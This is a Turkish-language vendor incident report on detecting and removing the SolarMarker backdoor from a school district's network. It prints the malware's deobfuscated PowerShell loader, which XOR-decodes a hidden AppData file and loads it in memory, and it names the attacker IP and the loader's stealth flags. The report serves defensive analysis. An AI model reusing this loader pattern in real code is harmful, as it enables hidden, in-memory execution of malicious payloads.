2024'ün başlarında büyük bir K-12 okul bölgesi, siber güvenlik duruşunu güçlendirmek için ThreatDown MDR ile ortaklık kurdu. ThreatDown MDR analistleri, sisteme dahil edildikten kısa bir süre sonra, daha sonra karmaşık bir arka kapı olan SolarMarker'ın çalışması olarak tanımlanan olağandışı aktivite modellerini tespit etti. SolarMarker'ın en az 2021'den beri bölgenin sisteminde mevcut olduğu ve muhtemelen birkaç yıldır veri sızdırdığı ortaya çıktı.
Araştırmanın bulgularına ve tehdidi azaltmak için atılan adımlara daha detaylı bakalım.
SolarMarker enfeksiyonu
Arka plan
Olay, şüpheli bir IP adresine giden ağ bağlantısı kurmaya çalışan anormal bir PowerShell örneğinin tespit edilmesiyle başladı. (188.241.83.61). Bu bağlantı girişimi Malwarebytes Web Protection (MWAC) tarafından engellendi ve bu, potansiyel bir güvenlik ihlalinin ilk belirtisinin sinyalini verdi.
İlk zorluklar
Araştırmanın ardından, istemcinin uç nokta politikasında Uç Nokta Algılama ve Yanıt (EDR) ayarlarının devre dışı bırakıldığı keşfedildi. Bu sınırlama, ayrıntılı uç nokta verilerini yakalamak ve analiz etmek için Hızlı Yanıt Taramasının (FRS) kullanılmasını engelledi ve Aktif Yanıt Taraması (ARS) kullanan araştırmaya manuel bir yaklaşım gerektirdi.
Soruşturma ve analiz
İlk adım, aktif ağ bağlantılarının sorgulanmasını içeriyordu. netstatBu, PowerShell'in çalışır durumdaki bir örneğini ortaya çıkardı. Bu PowerShell örneğinin doğasını daha iyi anlamak için, karmaşık kodu ortaya çıkaran işlem kimliğine (PID) sahip Windows Yönetim Araçları Komut Satırı (WMIC) kullanılarak komut satırı incelendi.
SolarMarker'ın kodunu çözme ve anlama
Gizlenmiş PowerShell kodu çıkarıldı ve netlik sağlamak amacıyla yeniden düzenlendi. Analiz, kötü amaçlı yazılımın işleyişinin aşağıdaki bileşenlerini ortaya çıkardı:
powershell
$decodeKey = ''
$encodedFilePath="C:\Users\akeith\AppData\Roaming\micROSoft\wbpgVnSBjsytaokm\JqdVQplHfgwxyNmtaPX.gvzPlATqFe"
$decodedPayload = [System.IO.File]::ReadAllBytes($encodedFilePath)
for ($payloadIndex = 0; $payloadIndex -lt $decodedPayload.Count; $payloadIndex++) {
$decodedPayload[$payloadIndex] = $decodedPayload[$payloadIndex] -bxor $decodeKey[$payloadIndex % $decodeKey.Length]
if ($payloadIndex -ge $decodeKey.Length) {
$payloadIndex = $decodeKey.Length
}
}
[System.Reflection.Assembly]::Load($decodedPayload)
[ab821408b424418fa94bb4d815b4e.ad0682a943e4859ef35309cc0a537]::a1f5abfa214411baa77e25f6ceaa6()
Bu kod, kötü amaçlı yazılımın metodolojisini ortaya koymaktadır:
- Şifre çözme anahtarı olarak Base64 kodlu bir dize kullanır.
- Kodlanmış veriler için belirli bir dosya yolunu hedefler.
- Şifrelenmiş veriyi okur, kodunu çözer ve yürütür.
Komut satırı, pencereyi gizleme (-WindowStyle Hidden), yürütme politikalarını atlama (-Ep ByPass) ve kodlanmış komutları çalıştırma (-ComMand “sa43…) isteğini gösteren parametrelerle, kötü amaçlı komut dosyası yürütmenin işaretlerini gösterir.
Daha ileri araştırmalar, AppData\Roaming\Microsoft dizininde her biri kodlanmış veriler içeren rastgele adlandırılmış klasörleri ortaya çıkardı. Bu keşifler, enfeksiyonun başlangıçta tahmin edilenden daha yaygın olduğunu gösterdi.
Müdahale ve hafifletme
Yanıt, tehdidi kontrol altına almak ve ortadan kaldırmak için birkaç adımı içeriyordu:
- Kötü amaçlı PowerShell örneğinin sonlandırılması.
- Kodlanmış verileri içeren tanımlanan klasörler siliniyor.
- Kalıcılık mekanizmaları için kapsamlı bir araştırma yürütüyoruz ama neyse ki hiçbir bulguya ulaşmıyoruz.
Kapsamlı bir tehdit taraması gerçekleştirildi ve olay, müşterinin görünürlüğü için iletildi. Yeniden başlatma sonrası kontroller kalıcılığın olmadığını, yeni PowerShell örneklerinin ortaya çıkmadığını ve şüpheli ağ bağlantılarının engellendiğini doğruladı; bu da enfeksiyonun başarılı bir şekilde iyileştirildiğini gösteriyor.
Çözüm
2024 Eğitimde Fidye Yazılımlarının Durumu raporumuzda da gördüğümüz gibi eğitim sektörü saldırganların ana hedefi olmaya devam ediyor. Bu durumda saldırganlar, okul bölgesinin ağında yıllarca gizlenmek için karmaşık bir arka kapı olan SolarMarker'ı kullandılar ve muhtemelen bu süreçte verileri çaldılar. Bölge ThreatDown MDR'ye katılana kadar varlığı fark edilmedi. ThreatDown MDR ekibi, EDR ayarlarının devre dışı bırakılması gibi başlangıçtaki engellerle karşılaşmasına rağmen, manuel müdahale yoluyla SolarMarker enfeksiyonunu başarıyla tanımladı ve etkisiz hale getirdi.
ThreatDown MDR'nin K-12 kurumunuzu nasıl koruyabileceğini keşfedin.